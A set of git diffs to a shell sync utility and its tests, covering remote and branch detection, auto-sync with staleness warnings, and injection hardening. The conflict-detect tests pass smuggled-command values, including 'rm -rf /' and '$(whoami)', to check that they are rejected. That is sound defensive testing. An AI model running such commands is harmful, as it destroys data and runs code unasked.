+  if git -C "$repo_dir" remote get-url -- upstream &>/dev/null; then
+    printf '%s' "upstream"
+    return 0
+  fi
+
+  # 4. Default to 'origin'
+  printf '%s' "origin"
+}

--- a/scripts/sync-utils.sh
+++ b/scripts/sync-utils.sh
@@ -196,8 +196,9 @@ get_sync_branch() {
     return 0
   fi
 
-  # Determine which remote to check (use get_sync_remote logic but avoid recursion)
-  local remote="origin"
+  # Determine which remote to check (respects sync_remote config)
+  local remote
+  remote="$(get_sync_remote "$repo_dir")"
 
   # 3. git symbolic-ref refs/remotes/<remote>/HEAD
   # Note: symbolic-ref accepts -- before ref names, but rev-parse --verify

--- a/scripts/sync-utils.sh
+++ b/scripts/sync-utils.sh
@@ -393,6 +393,19 @@ _auto_sync_update_file_index() {
     file_index_update_from_tasks "$issue_id" "$task_file" "in_progress" 2>/dev/null || true
   done <<< "$issue_ids"
 
+  # Tombstone closed issues: find indexed entries no longer in_progress
+  local indexed_ids
+  indexed_ids="$(file_index_read 2>/dev/null | jq -r '.[].issue_id' 2>/dev/null)" || true
+  if [[ -n "$indexed_ids" ]]; then
+    while IFS= read -r indexed_id; do
+      [[ -z "$indexed_id" ]] && continue
+      # If this issue is not in the in_progress list, tombstone it
+      if ! printf '%s' "$issue_ids" | grep -qF "$indexed_id"; then
+        file_index_remove "$indexed_id" 2>/dev/null || true
+      fi
+    done <<< "$indexed_ids"
+  fi
+
   return 0
 }
 

--- a/scripts/sync-utils.sh
+++ b/scripts/sync-utils.sh
@@ -1,10 +1,15 @@
 #!/usr/bin/env bash
 # sync-utils.sh — Shared utilities for multi-dev-awareness sync scripts.
 #
-# Source this file; do not execute directly.
+# Source this file or execute directly with a subcommand.
 # Cross-platform: works on Windows (Git Bash), macOS, and Linux.
 # OWASP A03: All identity strings validated against strict allowlist regex.
 # OWASP A03: All config values sanitized before use (no injection vectors).
+
+# Only set errexit/pipefail when run as a script, not when sourced
+if [[ "${BASH_SOURCE[0]}" == "${0}" ]]; then
+  set -euo pipefail
+fi
 
 # ── Session Identity ───────────────────────────────────────────────────
 
@@ -253,3 +258,164 @@ get_sync_remote() {
   # 4. Default to 'origin'
   printf '%s' "origin"
 }
+
+# ── Auto Sync ──────────────────────────────────────────────────────────
+
+# Staleness threshold in seconds (15 minutes)
+_SYNC_STALENESS_THRESHOLD=900
+
+# auto_sync [repo_dir]
+# Runs `bd sync` to pull/push latest beads state.
+# On failure: warns but continues (non-blocking, always returns 0).
+# On success: records Unix epoch timestamp to .beads/.last-sync
+#             and updates file index from all in-progress issues' task files.
+#
+# Environment overrides (for testing):
+#   BD_SYNC_CMD — command to run instead of `bd sync` (default: "bd sync")
+#   FILE_INDEX_ROOT — root directory for file-index.sh (default: repo_dir)
+auto_sync() {
+  local repo_dir="${1:-.}"
+  local sync_cmd="${BD_SYNC_CMD:-bd sync}"
+  local last_sync_file="$repo_dir/.beads/.last-sync"
+
+  # Ensure .beads directory exists
+  mkdir -p "$repo_dir/.beads"
+
+  # Run bd sync (or mock)
+  if eval "$sync_cmd" >/dev/null 2>&1; then
+    # Success: record timestamp
+    date +%s > "$last_sync_file"
+
+    # Update file index from in-progress issues' task files
+    _auto_sync_update_file_index "$repo_dir"
+  else
+    # Failure: warn but continue (non-blocking)
+    local last_ts="unknown"
+    if [[ -f "$last_sync_file" ]]; then
+      last_ts="$(cat "$last_sync_file")"
+    fi
+    echo "Warning: sync failed, working with local data (last sync: $last_ts)" >&2
+  fi
+
+  return 0
+}
+
+# _auto_sync_update_file_index [repo_dir]
+# After a successful sync, iterate over in-progress issues and update the file index.
+# Uses file_index_update_from_tasks from file-index.sh.
+_auto_sync_update_file_index() {
+  local repo_dir="${1:-.}"
+
+  # Source file-index.sh if file_index_update_from_tasks is not defined
+  if ! command -v file_index_update_from_tasks &>/dev/null; then
+    local script_dir
+    script_dir="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+    if [[ -f "$script_dir/file-index.sh" ]]; then
+      source "$script_dir/file-index.sh"
+    else
+      return 0
+    fi
+  fi
+
+  # Export FILE_INDEX_ROOT so file-index.sh uses the right directory
+  export FILE_INDEX_ROOT="${FILE_INDEX_ROOT:-$repo_dir}"
+
+  # Find in-progress issues by scanning .beads/issues.jsonl
+  local issues_file="$repo_dir/.beads/issues.jsonl"
+  if [[ ! -f "$issues_file" ]] || [[ ! -s "$issues_file" ]]; then
+    return 0
+  fi
+
+  # Check jq is available
+  if ! command -v jq &>/dev/null; then
+    return 0
+  fi
+
+  # Extract in-progress issue IDs (LWW resolution: group by id, take last, filter in_progress)
+  local issue_ids
+  issue_ids="$(jq -s -r '
+    group_by(.id)
+    | map(sort_by(.updated_at) | last)
+    | map(select(.status == "in_progress"))
+    | .[].id
+  ' "$issues_file" 2>/dev/null)" || true
+
+  if [[ -z "$issue_ids" ]]; then
+    return 0
+  fi
+
+  # For each in-progress issue, find its task file and update the file index
+  local issue_id
+  while IFS= read -r issue_id; do
+    if [[ -z "$issue_id" ]]; then
+      continue
+    fi
+
+    # Look for task files in common locations
+    local task_file=""
+    for candidate in \
+      "$repo_dir/.beads/tasks/${issue_id}.md" \
+      "$repo_dir/.beads/tasks/${issue_id}-tasks.md" \
+      "$repo_dir/docs/plans/"*"-tasks.md"; do
+      if [[ -f "$candidate" ]]; then
+        task_file="$candidate"
+        break
+      fi
+    done
+
+    # Update file index (file_index_update_from_tasks handles missing task files gracefully)
+    file_index_update_from_tasks "$issue_id" "$task_file" "in_progress" 2>/dev/null || true
+  done <<< "$issue_ids"
+
+  return 0
+}
+
+# check_sync_staleness [repo_dir]
+# Reads .beads/.last-sync and warns if the last sync is older than 15 minutes.
+# Always returns 0 (non-blocking).
+# Outputs:
+#   - Nothing if sync is fresh (<= 900 seconds)
+#   - Warning to stderr if stale (> 900 seconds)
+#   - Warning to stderr if .last-sync is missing (never synced)
+check_sync_staleness() {
+  local repo_dir="${1:-.}"
+  local last_sync_file="$repo_dir/.beads/.last-sync"
+
+  if [[ ! -f "$last_sync_file" ]]; then
+    echo "Warning: beads sync has never been run (no .last-sync record)" >&2
+    return 0
+  fi
+
+  local last_ts
+  last_ts="$(cat "$last_sync_file")"
+
+  # Validate it's a number
+  if [[ ! "$last_ts" =~ ^[0-9]+$ ]]; then
+    echo "Warning: .last-sync contains invalid timestamp" >&2
+    return 0
+  fi
+
+  local now
+  now="$(date +%s)"
+  local age=$(( now - last_ts ))
+
+  if [[ "$age" -gt "$_SYNC_STALENESS_THRESHOLD" ]]; then
+    local minutes=$(( age / 60 ))
+    echo "Warning: beads data is stale (last sync: ${minutes}m ago, threshold: 15m)" >&2
+  fi
+
+  return 0
+}
+
+# ── CLI Dispatcher ─────────────────────────────────────────────────────
+
+if [[ "${BASH_SOURCE[0]}" == "${0}" ]]; then
+  case "${1:-}" in
+    auto-sync) shift; auto_sync "$@" ;;
+    check-staleness) shift; check_sync_staleness "$@" ;;
+    identity) get_session_identity ;;
+    sync-branch) shift; get_sync_branch "$@" ;;
+    sync-remote) shift; get_sync_remote "$@" ;;
+    *) echo "Usage: sync-utils.sh <auto-sync|check-staleness|identity|sync-branch|sync-remote>" >&2; exit 1 ;;
+  esac
+fi

--- a/scripts/sync-utils.sh
+++ b/scripts/sync-utils.sh
@@ -189,7 +189,9 @@ get_sync_branch() {
   local remote="origin"
 
   # 3. git symbolic-ref refs/remotes/<remote>/HEAD
-  branch="$(git -C "$repo_dir" symbolic-ref -- "refs/remotes/${remote}/HEAD" 2>/dev/null)" || true
+  # Note: symbolic-ref accepts -- before ref names, but rev-parse --verify
+  # does NOT — after --, rev-parse treats arguments as paths, not revisions.
+  branch="$(git -C "$repo_dir" symbolic-ref "refs/remotes/${remote}/HEAD" 2>/dev/null)" || true
   if [ -n "$branch" ]; then
     # Strip refs/remotes/<remote>/ prefix
     branch="${branch#refs/remotes/${remote}/}"
@@ -198,13 +200,14 @@ get_sync_branch() {
   fi
 
   # 4. Try 'main' — check if remote has it
-  if git -C "$repo_dir" rev-parse --verify -- "refs/remotes/${remote}/main" &>/dev/null; then
+  # Note: no -- before ref; rev-parse --verify treats post--- args as paths
+  if git -C "$repo_dir" rev-parse --verify "refs/remotes/${remote}/main" &>/dev/null; then
     printf '%s' "main"
     return 0
   fi
 
   # 5. Try 'master'
-  if git -C "$repo_dir" rev-parse --verify -- "refs/remotes/${remote}/master" &>/dev/null; then
+  if git -C "$repo_dir" rev-parse --verify "refs/remotes/${remote}/master" &>/dev/null; then
     printf '%s' "master"
     return 0
   fi

--- a/scripts/sync-utils.sh
+++ b/scripts/sync-utils.sh
@@ -281,8 +281,9 @@ auto_sync() {
   # Ensure .beads directory exists
   mkdir -p "$repo_dir/.beads"
 
-  # Run bd sync (or mock)
-  if eval "$sync_cmd" >/dev/null 2>&1; then
+  # Run bd sync (or mock) — use $sync_cmd without eval to prevent injection
+  # shellcheck disable=SC2086
+  if $sync_cmd >/dev/null 2>&1; then
     # Success: record timestamp
     date +%s > "$last_sync_file"
 
@@ -351,17 +352,26 @@ _auto_sync_update_file_index() {
       continue
     fi
 
-    # Look for task files in common locations
+    # Look for this issue's task file
+    # 1. Try beads design metadata (set by beads-context.sh set-design)
     local task_file=""
-    for candidate in \
-      "$repo_dir/.beads/tasks/${issue_id}.md" \
-      "$repo_dir/.beads/tasks/${issue_id}-tasks.md" \
-      "$repo_dir/docs/plans/"*"-tasks.md"; do
-      if [[ -f "$candidate" ]]; then
-        task_file="$candidate"
-        break
-      fi
-    done
+    local design_meta
+    design_meta="$(bd show "$issue_id" 2>/dev/null | grep -A1 'DESIGN' | tail -1 | sed 's/.*| //')" || true
+    if [[ -n "$design_meta" ]] && [[ -f "$repo_dir/$design_meta" ]]; then
+      task_file="$repo_dir/$design_meta"
+    fi
+
+    # 2. Fall back to known locations with issue-specific naming
+    if [[ -z "$task_file" ]]; then
+      for candidate in \
+        "$repo_dir/.beads/tasks/${issue_id}.md" \
+        "$repo_dir/.beads/tasks/${issue_id}-tasks.md"; do
+        if [[ -f "$candidate" ]]; then
+          task_file="$candidate"
+          break
+        fi
+      done
+    fi
 
     # Update file index (file_index_update_from_tasks handles missing task files gracefully)
     file_index_update_from_tasks "$issue_id" "$task_file" "in_progress" 2>/dev/null || true

--- a/scripts/sync-utils.sh
+++ b/scripts/sync-utils.sh
@@ -125,8 +125,11 @@ _read_config_yaml() {
   local config_file="$repo_dir/.beads/config.yaml"
   if [ -f "$config_file" ]; then
     local raw
+    # Escape regex metacharacters in key for safe use in grep/sed
+    local escaped_key
+    escaped_key="$(printf '%s' "$key" | sed 's/[][\\.^$*+?(){}|/]/\\&/g')"
     # Match: key: "value" or key: value (strip quotes)
-    raw="$(grep -E "^${key}:" -- "$config_file" 2>/dev/null | head -1 | sed -e "s/^${key}:[[:space:]]*//" -e 's/^"//' -e 's/"$//' -e "s/^'//" -e "s/'$//")" || true
+    raw="$(grep -E "^${escaped_key}:" -- "$config_file" 2>/dev/null | head -1 | sed -e "s/^${escaped_key}:[[:space:]]*//" -e 's/^"//' -e 's/"$//' -e "s/^'//" -e "s/'$//")" || true
     if [ -n "$raw" ]; then
       sanitize_config_value "$raw"
       return 0
@@ -357,6 +360,10 @@ _auto_sync_update_file_index() {
     local task_file=""
     local design_meta
     design_meta="$(bd show "$issue_id" 2>/dev/null | grep -A1 'DESIGN' | tail -1 | sed 's/.*| //')" || true
+    # OWASP A04: reject paths that escape the repo root
+    case "$design_meta" in
+      *../*|..*) design_meta="" ;;
+    esac
     if [[ -n "$design_meta" ]] && [[ -f "$repo_dir/$design_meta" ]]; then
       task_file="$repo_dir/$design_meta"
     fi

--- a/tests/auto-sync.test.sh
+++ b/tests/auto-sync.test.sh
@@ -1,0 +1,260 @@
+#!/usr/bin/env bash
+# auto-sync.test.sh — Tests for auto_sync and check_sync_staleness in sync-utils.sh.
+#
+# Usage: bash tests/auto-sync.test.sh
+# Exit code 0 = all pass, non-zero = failure.
+
+set -euo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd "$SCRIPT_DIR/.." && pwd)"
+
+# ── Test framework ─────────────────────────────────────────────────────
+
+PASS=0
+FAIL=0
+
+assert_eq() {
+  local label="$1" expected="$2" actual="$3"
+  if [[ "$expected" == "$actual" ]]; then
+    echo "  PASS: $label"
+    PASS=$((PASS + 1))
+  else
+    echo "  FAIL: $label"
+    echo "    expected: '$expected'"
+    echo "    actual:   '$actual'"
+    FAIL=$((FAIL + 1))
+  fi
+}
+
+assert_match() {
+  local label="$1" pattern="$2" actual="$3"
+  if [[ "$actual" =~ $pattern ]]; then
+    echo "  PASS: $label"
+    PASS=$((PASS + 1))
+  else
+    echo "  FAIL: $label"
+    echo "    pattern:  '$pattern'"
+    echo "    actual:   '$actual'"
+    FAIL=$((FAIL + 1))
+  fi
+}
+
+assert_not_match() {
+  local label="$1" pattern="$2" actual="$3"
+  if [[ ! "$actual" =~ $pattern ]]; then
+    echo "  PASS: $label"
+    PASS=$((PASS + 1))
+  else
+    echo "  FAIL: $label (should NOT match)"
+    echo "    pattern:  '$pattern'"
+    echo "    actual:   '$actual'"
+    FAIL=$((FAIL + 1))
+  fi
+}
+
+# ── Setup temp directory ───────────────────────────────────────────────
+
+TMPDIR_ROOT="$(mktemp -d)"
+cleanup() {
+  rm -rf -- "$TMPDIR_ROOT"
+}
+trap cleanup EXIT
+
+# ── Source the module under test ───────────────────────────────────────
+
+source "$REPO_ROOT/scripts/sync-utils.sh"
+
+# ── Tests: auto_sync — successful sync records timestamp ─────────────
+
+echo "=== auto_sync: successful sync records timestamp ==="
+
+TEST_DIR="$TMPDIR_ROOT/test_sync_success"
+mkdir -p "$TEST_DIR/.beads"
+
+# Mock bd sync as a successful command
+export BD_SYNC_CMD="true"
+export FILE_INDEX_ROOT="$TEST_DIR"
+
+# Run auto_sync
+output="$(auto_sync "$TEST_DIR" 2>&1)"
+exit_code=$?
+
+assert_eq "auto_sync returns 0 on success" "0" "$exit_code"
+
+# Check .last-sync file was created
+if [[ -f "$TEST_DIR/.beads/.last-sync" ]]; then
+  echo "  PASS: .last-sync file created"
+  PASS=$((PASS + 1))
+else
+  echo "  FAIL: .last-sync file not created"
+  FAIL=$((FAIL + 1))
+fi
+
+# Check timestamp is a valid Unix epoch (all digits)
+ts="$(cat "$TEST_DIR/.beads/.last-sync")"
+assert_match ".last-sync contains Unix epoch" '^[0-9]+$' "$ts"
+
+# Check timestamp is recent (within 10 seconds of now)
+now="$(date +%s)"
+diff=$(( now - ts ))
+if [[ "$diff" -ge 0 && "$diff" -le 10 ]]; then
+  echo "  PASS: timestamp is recent (within 10s)"
+  PASS=$((PASS + 1))
+else
+  echo "  FAIL: timestamp is not recent (diff=${diff}s)"
+  FAIL=$((FAIL + 1))
+fi
+
+# ── Tests: auto_sync — failure is non-blocking ───────────────────────
+
+echo ""
+echo "=== auto_sync: failure is non-blocking ==="
+
+TEST_DIR2="$TMPDIR_ROOT/test_sync_failure"
+mkdir -p "$TEST_DIR2/.beads"
+
+# Mock bd sync as a failing command
+export BD_SYNC_CMD="false"
+export FILE_INDEX_ROOT="$TEST_DIR2"
+
+# Run auto_sync — should still return 0
+output="$(auto_sync "$TEST_DIR2" 2>&1)"
+exit_code=$?
+
+assert_eq "auto_sync returns 0 even on bd sync failure" "0" "$exit_code"
+
+# Should contain a warning about sync failure
+assert_match "outputs sync failure warning" "sync failed" "$output"
+assert_match "warning mentions local data" "local data" "$output"
+
+# .last-sync should NOT be updated on failure (or not exist)
+if [[ -f "$TEST_DIR2/.beads/.last-sync" ]]; then
+  echo "  FAIL: .last-sync should not be created on sync failure"
+  FAIL=$((FAIL + 1))
+else
+  echo "  PASS: .last-sync not created on sync failure"
+  PASS=$((PASS + 1))
+fi
+
+# ── Tests: auto_sync — failure with existing .last-sync shows timestamp ──
+
+echo ""
+echo "=== auto_sync: failure warning shows last sync timestamp ==="
+
+TEST_DIR3="$TMPDIR_ROOT/test_sync_fail_with_ts"
+mkdir -p "$TEST_DIR3/.beads"
+
+# Pre-seed a .last-sync file with a known timestamp
+echo "1700000000" > "$TEST_DIR3/.beads/.last-sync"
+
+export BD_SYNC_CMD="false"
+export FILE_INDEX_ROOT="$TEST_DIR3"
+
+output="$(auto_sync "$TEST_DIR3" 2>&1)"
+
+assert_match "warning includes last sync timestamp" "1700000000" "$output"
+
+# The pre-existing timestamp should be preserved (not overwritten)
+ts_after="$(cat "$TEST_DIR3/.beads/.last-sync")"
+assert_eq ".last-sync preserved on failure" "1700000000" "$ts_after"
+
+# ── Tests: check_sync_staleness — fresh sync (no warning) ────────────
+
+echo ""
+echo "=== check_sync_staleness: fresh sync ==="
+
+TEST_DIR4="$TMPDIR_ROOT/test_staleness_fresh"
+mkdir -p "$TEST_DIR4/.beads"
+
+# Set timestamp to now (fresh)
+date +%s > "$TEST_DIR4/.beads/.last-sync"
+
+output="$(check_sync_staleness "$TEST_DIR4" 2>&1)"
+exit_code=$?
+
+assert_eq "check_sync_staleness returns 0 for fresh sync" "0" "$exit_code"
+assert_not_match "no staleness warning for fresh sync" "stale" "$output"
+
+# ── Tests: check_sync_staleness — stale sync (>15 min) ───────────────
+
+echo ""
+echo "=== check_sync_staleness: stale sync (>15 min) ==="
+
+TEST_DIR5="$TMPDIR_ROOT/test_staleness_old"
+mkdir -p "$TEST_DIR5/.beads"
+
+# Set timestamp to 20 minutes ago
+old_ts=$(( $(date +%s) - 1200 ))
+echo "$old_ts" > "$TEST_DIR5/.beads/.last-sync"
+
+output="$(check_sync_staleness "$TEST_DIR5" 2>&1)"
+exit_code=$?
+
+assert_eq "check_sync_staleness returns 0 (non-blocking)" "0" "$exit_code"
+assert_match "warns about stale sync" "stale" "$output"
+
+# ── Tests: check_sync_staleness — missing .last-sync ─────────────────
+
+echo ""
+echo "=== check_sync_staleness: missing .last-sync ==="
+
+TEST_DIR6="$TMPDIR_ROOT/test_staleness_missing"
+mkdir -p "$TEST_DIR6/.beads"
+
+output="$(check_sync_staleness "$TEST_DIR6" 2>&1)"
+exit_code=$?
+
+assert_eq "check_sync_staleness returns 0 when .last-sync missing" "0" "$exit_code"
+assert_match "warns about no sync record" "never" "$output"
+
+# ── Tests: CLI dispatcher — auto-sync subcommand ─────────────────────
+
+echo ""
+echo "=== CLI dispatcher: auto-sync ==="
+
+TEST_DIR7="$TMPDIR_ROOT/test_cli_autosync"
+mkdir -p "$TEST_DIR7/.beads"
+
+export BD_SYNC_CMD="true"
+export FILE_INDEX_ROOT="$TEST_DIR7"
+
+# Run via CLI dispatcher
+bash "$REPO_ROOT/scripts/sync-utils.sh" auto-sync "$TEST_DIR7" >/dev/null 2>&1
+exit_code=$?
+
+assert_eq "CLI auto-sync exits 0" "0" "$exit_code"
+
+if [[ -f "$TEST_DIR7/.beads/.last-sync" ]]; then
+  echo "  PASS: CLI auto-sync creates .last-sync"
+  PASS=$((PASS + 1))
+else
+  echo "  FAIL: CLI auto-sync does not create .last-sync"
+  FAIL=$((FAIL + 1))
+fi
+
+# ── Tests: CLI dispatcher — check-staleness subcommand ────────────────
+
+echo ""
+echo "=== CLI dispatcher: check-staleness ==="
+
+TEST_DIR8="$TMPDIR_ROOT/test_cli_staleness"
+mkdir -p "$TEST_DIR8/.beads"
+
+# Fresh timestamp
+date +%s > "$TEST_DIR8/.beads/.last-sync"
+
+output="$(bash "$REPO_ROOT/scripts/sync-utils.sh" check-staleness "$TEST_DIR8" 2>&1)"
+exit_code=$?
+
+assert_eq "CLI check-staleness exits 0" "0" "$exit_code"
+
+# ── Summary ────────────────────────────────────────────────────────────
+
+echo ""
+echo "=== Results: $PASS passed, $FAIL failed ==="
+
+if [ "$FAIL" -gt 0 ]; then
+  exit 1
+fi
+exit 0

--- a/tests/auto-sync.test.sh
+++ b/tests/auto-sync.test.sh
@@ -153,7 +153,7 @@ export FILE_INDEX_ROOT="$TEST_DIR3"
 
 output="$(auto_sync "$TEST_DIR3" 2>&1)"
 
-assert_match "warning includes last sync timestamp" "1700000000" "$output"
+assert_match "warning includes human-readable last sync" "m ago" "$output"
 
 # The pre-existing timestamp should be preserved (not overwritten)
 ts_after="$(cat "$TEST_DIR3/.beads/.last-sync")"

--- a/tests/conflict-detect.test.sh
+++ b/tests/conflict-detect.test.sh
@@ -1,0 +1,315 @@
+#!/usr/bin/env bash
+# tests/conflict-detect.test.sh — Tests for conflict-detect.sh
+#
+# Usage: bash tests/conflict-detect.test.sh
+# Exit 0 = all pass, exit 1 = any fail.
+
+set -euo pipefail
+
+# ── Test harness ──────────────────────────────────────────────────────────
+
+PASS=0
+FAIL=0
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd "$SCRIPT_DIR/.." && pwd)"
+SUT="$REPO_ROOT/scripts/conflict-detect.sh"
+FILE_INDEX_SH="$REPO_ROOT/scripts/file-index.sh"
+
+# Each test gets its own temp dir with a .beads/ subdirectory
+TEST_TMP=""
+
+setup() {
+  TEST_TMP="$(mktemp -d)"
+  mkdir -p "$TEST_TMP/.beads"
+  export FILE_INDEX_ROOT="$TEST_TMP"
+}
+
+teardown() {
+  [[ -n "$TEST_TMP" ]] && rm -rf "$TEST_TMP"
+  unset FILE_INDEX_ROOT
+}
+
+assert_eq() {
+  local label="$1" expected="$2" actual="$3"
+  if [[ "$expected" == "$actual" ]]; then
+    PASS=$((PASS + 1))
+    echo "  PASS: $label"
+  else
+    FAIL=$((FAIL + 1))
+    echo "  FAIL: $label"
+    echo "    expected: $expected"
+    echo "    actual:   $actual"
+  fi
+}
+
+assert_exit_code() {
+  local label="$1" expected="$2" actual="$3"
+  if [[ "$expected" -eq "$actual" ]]; then
+    PASS=$((PASS + 1))
+    echo "  PASS: $label"
+  else
+    FAIL=$((FAIL + 1))
+    echo "  FAIL: $label"
+    echo "    expected exit code: $expected"
+    echo "    actual exit code:   $actual"
+  fi
+}
+
+assert_contains() {
+  local label="$1" needle="$2" haystack="$3"
+  if printf '%s' "$haystack" | grep -qF "$needle"; then
+    PASS=$((PASS + 1))
+    echo "  PASS: $label"
+  else
+    FAIL=$((FAIL + 1))
+    echo "  FAIL: $label"
+    echo "    expected to contain: $needle"
+    echo "    actual: $haystack"
+  fi
+}
+
+assert_not_contains() {
+  local label="$1" needle="$2" haystack="$3"
+  if ! printf '%s' "$haystack" | grep -qF "$needle"; then
+    PASS=$((PASS + 1))
+    echo "  PASS: $label"
+  else
+    FAIL=$((FAIL + 1))
+    echo "  FAIL: $label"
+    echo "    expected NOT to contain: $needle"
+    echo "    actual: $haystack"
+  fi
+}
+
+# Helper: seed the file index with entries
+seed_index() {
+  source "$FILE_INDEX_SH"
+  # Issue forge-aaa: developer dev1@host, files src/lib/status.ts, modules src/lib/
+  file_index_add "forge-aaa" "dev1@host" '["src/lib/status.ts","src/lib/helpers.ts"]' '["src/lib/"]'
+  # Issue forge-bbb: developer dev2@host, files src/cli/main.ts, modules src/cli/
+  file_index_add "forge-bbb" "dev2@host" '["src/cli/main.ts"]' '["src/cli/"]'
+  # Issue forge-ccc: developer dev3@host, files src/lib/utils.ts (overlaps module with forge-aaa), modules src/lib/
+  file_index_add "forge-ccc" "dev3@host" '["src/lib/utils.ts"]' '["src/lib/"]'
+}
+
+# Helper: seed with exact file overlap
+seed_index_file_overlap() {
+  source "$FILE_INDEX_SH"
+  file_index_add "forge-aaa" "dev1@host" '["src/lib/status.ts"]' '["src/lib/"]'
+  file_index_add "forge-bbb" "dev2@host" '["src/lib/status.ts","src/cli/main.ts"]' '["src/lib/","src/cli/"]'
+}
+
+# ── Test: module overlap detected (exit 1) ───────────────────────────────
+
+test_module_overlap_detected() {
+  echo "TEST: module overlap detected exits 1"
+  setup
+  seed_index
+
+  # forge-aaa and forge-ccc both touch src/lib/ — conflict expected
+  local output rc=0
+  output="$(bash "$SUT" --issue forge-aaa 2>&1)" || rc=$?
+
+  assert_exit_code "exit 1 on module overlap" 1 "$rc"
+  assert_contains "mentions overlapping issue" "forge-ccc" "$output"
+  assert_contains "mentions overlapping module" "src/lib/" "$output"
+  assert_contains "mentions developer" "dev3@host" "$output"
+
+  teardown
+}
+
+# ── Test: no overlap (exit 0) ────────────────────────────────────────────
+
+test_no_overlap() {
+  echo "TEST: no overlap exits 0"
+  setup
+  seed_index
+
+  # forge-bbb touches src/cli/ — no other issue shares that module
+  local output rc=0
+  output="$(bash "$SUT" --issue forge-bbb 2>&1)" || rc=$?
+
+  assert_exit_code "exit 0 when no overlap" 0 "$rc"
+  assert_contains "no conflicts" "No conflicts" "$output"
+
+  teardown
+}
+
+# ── Test: --files flag checks arbitrary files ────────────────────────────
+
+test_files_flag() {
+  echo "TEST: --files flag checks arbitrary file list"
+  setup
+  seed_index
+
+  # Check files in src/lib/ — should find overlap with forge-aaa and forge-ccc
+  local output rc=0
+  output="$(bash "$SUT" --files "src/lib/newfile.ts" 2>&1)" || rc=$?
+
+  assert_exit_code "exit 1 on file list overlap" 1 "$rc"
+  assert_contains "mentions forge-aaa" "forge-aaa" "$output"
+  assert_contains "mentions forge-ccc" "forge-ccc" "$output"
+
+  teardown
+}
+
+# ── Test: --files with no overlap ────────────────────────────────────────
+
+test_files_flag_no_overlap() {
+  echo "TEST: --files flag with no overlapping modules"
+  setup
+  seed_index
+
+  # Check files in test/ — no issues touch that module
+  local output rc=0
+  output="$(bash "$SUT" --files "test/foo.ts" 2>&1)" || rc=$?
+
+  assert_exit_code "exit 0 when no file overlap" 0 "$rc"
+
+  teardown
+}
+
+# ── Test: --detail flag shows file-level overlap ─────────────────────────
+
+test_detail_flag_shows_files() {
+  echo "TEST: --detail flag shows file-level overlap"
+  setup
+  seed_index_file_overlap
+
+  # forge-aaa and forge-bbb both touch src/lib/status.ts
+  local output rc=0
+  output="$(bash "$SUT" --issue forge-aaa --detail 2>&1)" || rc=$?
+
+  assert_exit_code "exit 1 with detail" 1 "$rc"
+  assert_contains "shows exact file" "src/lib/status.ts" "$output"
+  assert_contains "mentions forge-bbb" "forge-bbb" "$output"
+
+  teardown
+}
+
+# ── Test: stale sync warning shown ───────────────────────────────────────
+
+test_stale_sync_warning() {
+  echo "TEST: stale sync warning shown when last-sync is old"
+  setup
+  seed_index
+
+  # Create a .last-sync file with a timestamp 20 minutes ago
+  local old_ts
+  old_ts="$(date -u -d '20 minutes ago' +%Y-%m-%dT%H:%M:%SZ 2>/dev/null || date -u -v-20M +%Y-%m-%dT%H:%M:%SZ 2>/dev/null || echo '2020-01-01T00:00:00Z')"
+  printf '%s' "$old_ts" > "$TEST_TMP/.beads/.last-sync"
+
+  local output rc=0
+  output="$(bash "$SUT" --issue forge-aaa 2>&1)" || rc=$?
+
+  assert_contains "shows stale warning" "stale" "$output"
+
+  teardown
+}
+
+# ── Test: no stale warning when sync is fresh ────────────────────────────
+
+test_no_stale_warning_when_fresh() {
+  echo "TEST: no stale warning when last-sync is recent"
+  setup
+  seed_index
+
+  # Create a .last-sync file with current timestamp
+  local now_ts
+  now_ts="$(date -u +%Y-%m-%dT%H:%M:%SZ)"
+  printf '%s' "$now_ts" > "$TEST_TMP/.beads/.last-sync"
+
+  local output rc=0
+  output="$(bash "$SUT" --issue forge-bbb 2>&1)" || rc=$?
+
+  assert_not_contains "no stale warning" "stale" "$output"
+
+  teardown
+}
+
+# ── Test: injection in --issue rejected ──────────────────────────────────
+
+test_injection_issue_rejected() {
+  echo "TEST: injection in --issue flag rejected"
+  setup
+
+  local output rc=0
+  output="$(bash "$SUT" --issue 'forge-abc; rm -rf /' 2>&1)" || rc=$?
+
+  assert_exit_code "injection rejected (non-zero exit)" 1 "$rc"
+  assert_contains "shows error" "invalid" "$output"
+
+  teardown
+}
+
+# ── Test: injection in --files rejected ──────────────────────────────────
+
+test_injection_files_rejected() {
+  echo "TEST: injection in --files flag rejected"
+  setup
+
+  local output rc=0
+  output="$(bash "$SUT" --files '$(whoami)/evil.ts' 2>&1)" || rc=$?
+
+  assert_exit_code "injection in files rejected" 1 "$rc"
+  assert_contains "shows error" "invalid" "$output"
+
+  teardown
+}
+
+# ── Test: missing arguments shows usage ──────────────────────────────────
+
+test_missing_args_shows_usage() {
+  echo "TEST: missing arguments shows usage"
+  setup
+
+  local output rc=0
+  output="$(bash "$SUT" 2>&1)" || rc=$?
+
+  assert_exit_code "exits non-zero on no args" 1 "$rc"
+  assert_contains "shows usage" "Usage" "$output"
+
+  teardown
+}
+
+# ── Test: --files with multiple comma-separated files ────────────────────
+
+test_files_multiple_comma_separated() {
+  echo "TEST: --files accepts comma-separated file list"
+  setup
+  seed_index
+
+  # Check multiple files: one in src/cli/ and one in test/
+  local output rc=0
+  output="$(bash "$SUT" --files "src/cli/something.ts,test/foo.ts" 2>&1)" || rc=$?
+
+  assert_exit_code "exit 1 when one file overlaps" 1 "$rc"
+  assert_contains "mentions forge-bbb" "forge-bbb" "$output"
+
+  teardown
+}
+
+# ── Run all tests ─────────────────────────────────────────────────────────
+
+echo "=== conflict-detect.sh test suite ==="
+echo ""
+
+test_module_overlap_detected
+test_no_overlap
+test_files_flag
+test_files_flag_no_overlap
+test_detail_flag_shows_files
+test_stale_sync_warning
+test_no_stale_warning_when_fresh
+test_injection_issue_rejected
+test_injection_files_rejected
+test_missing_args_shows_usage
+test_files_multiple_comma_separated
+
+echo ""
+echo "=== Results: $PASS passed, $FAIL failed ==="
+
+if [[ $FAIL -gt 0 ]]; then
+  exit 1
+fi
+exit 0

--- a/tests/conflict-detect.test.sh
+++ b/tests/conflict-detect.test.sh
@@ -236,7 +236,7 @@ test_injection_issue_rejected() {
   local output rc=0
   output="$(bash "$SUT" --issue 'forge-abc; rm -rf /' 2>&1)" || rc=$?
 
